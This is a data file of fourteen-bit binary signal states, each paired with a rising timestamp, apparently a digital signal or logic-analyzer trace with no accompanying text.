1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6058800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6059200e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6061200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6063600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6066000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6068400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6070800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6073600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6076000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6078800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6079200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6081200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6083600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6086000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6088400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6089200e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6090800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6093600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6094000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6096000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6098800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6101200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6103600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6106000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6108400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6110800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6113600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6114000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6116000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6118800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6119200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6121200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6123600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6126000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6128400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6130800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6134000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6136400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6138800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6141200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6143600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6146400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6148800e-04 1,0,1,0,1,1,0,0,0,0,0,0,0,0,6.6149200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6149600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6151600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6154000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6156400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6158800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6161200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6163600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6164400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6166400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6168800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6171600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6174000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6176400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6178800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6181200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6183600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6184400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6186400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6188800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6191600e-04 1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6194000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6194400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6196400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6198800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6199600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6201200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6203600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6206400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6208800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6211600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6214000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6216400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6218800e-04 1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6219200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6219600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6221200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6223600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6224400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6226400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6228800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6234000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6236400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6241200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6243600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6248800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6251600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6256400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6258800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6263600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6266400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6271600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6274000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6276400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6278800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6281200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6283600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6284400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6286400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6288800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6291600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6294000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6296400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6298800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6301200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6303600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6306400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6308800e-04 1,0,1,0,1,1,0,0,0,0,0,0,0,0,6.6309200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6309600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6311200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6314000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6316400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6318800e-04 1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6319200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6319600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6321200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6323600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6326000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6328800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6331600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6334000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6336400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6338800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6339600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6341200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6343600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6346400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6348800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6351600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6354000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6356400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6358800e-04 1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6359200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6359600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6361200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6363600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6366400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6368800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6371600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6374000e-04 1,0,1,0,1,1,0,0,0,0,0,0,0,0,6.6374400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6374800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6376400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6378800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6381200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6383600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6389200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6391600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6397200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6399600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6404400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6406800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6412400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6414800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6419600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6422000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6427200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6429600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6432000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6434800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6437200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6439600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6440000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6442000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6444400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6446800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6449600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6452000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6454800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6457200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6459600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6460400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6462000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6464400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6466800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6469600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6472000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6474800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6477200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6479600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6482000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6485200e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6487600e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6490000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6492400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6494800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6495600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6497600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6500000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6502800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6505200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6510000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6512400e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6517600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6520000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6525200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6527600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6532400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6534800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6540400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6542800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6547600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6550000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6552400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6554800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6557600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6560000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6562800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6565200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6567600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6570000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6572400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6574800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6577600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6580000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6582800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6585200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6587600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6590000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6592400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6594800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6597600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6600000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6602800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6605200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6607600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6610000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6612400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6614800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6617600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6620000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6622800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6625200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6627600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6630000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6632400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6634800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6637600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6640000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6642800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6645200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6647600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6650000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6652400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6654800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6657600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6660000e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6662400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6665200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6667600e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6670000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,1,7.9122800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,1,7.9140400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9142400e-04 0,1,1,0,1,0,0,0,0,0,0,1,0,1,7.9145200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9147600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9176400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9178800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9181200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9183600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9186400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9188800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9191600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9194000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9196400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9198800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,1,7.9201200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,1,7.9203600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9206000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9206400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9208800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9211600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9214000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9216400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9218800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9221200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9223600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9226400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9228800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9231600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9234000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9236400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9238800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9241200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9243600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9246400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9248800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9251600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9254000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9256400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9258800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9261200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9263600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9266400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9268800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9271600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9274000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9276400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9278800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9281200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9283600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9286400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9288800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9291600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9294000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9296400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9298800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9301200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9303600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9306400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9308800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9311600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9314000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9316400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9318800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9321200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9323600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9326400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9328400e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9331600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9334000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9336400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9338800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9341200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9343600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9346400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9348400e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9351600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9354000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9356400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9358800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9361200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9363600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9366400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9368800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9371600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9374000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9376400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9378800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9381200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9383600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9386400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9388800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9391600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9394000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9396400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9398800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9401200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9403600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9406400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9408800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9411600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9414000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9416400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9418800e-04 0,1,1,0,1,0,0,0,0,1,0,0,0,0,7.9419200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9419600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9421200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9423600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9426400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9428800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9431600e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9434000e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9436400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9438800e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9441200e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9443600e-04 0,1,1,0,1,1,0,0,0,1,0,0,1,0,7.9446400e-04 0,1,1,0,1,1,0,0,0,1,0,0,0,0,7.9448800e-04 0,1,1,0,1,1,0,0,0,0,0,0,0,0,7.9449200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9449600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9451600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9454000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9456400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9458800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9461200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9463600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9466400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9468800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9471600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9474000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9476400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9478800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9481200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9483600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9486400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9488800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9491600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9494000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9496400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9498800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9501200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9503600e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9506400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9508800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9511600e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9514000e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9516400e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9518800e-04 0,1,1,0,1,0,0,0,0,0,0,0,1,0,7.9521200e-04 0,1,1,0,1,0,0,0,0,0,0,0,0,0,7.9523600e-04 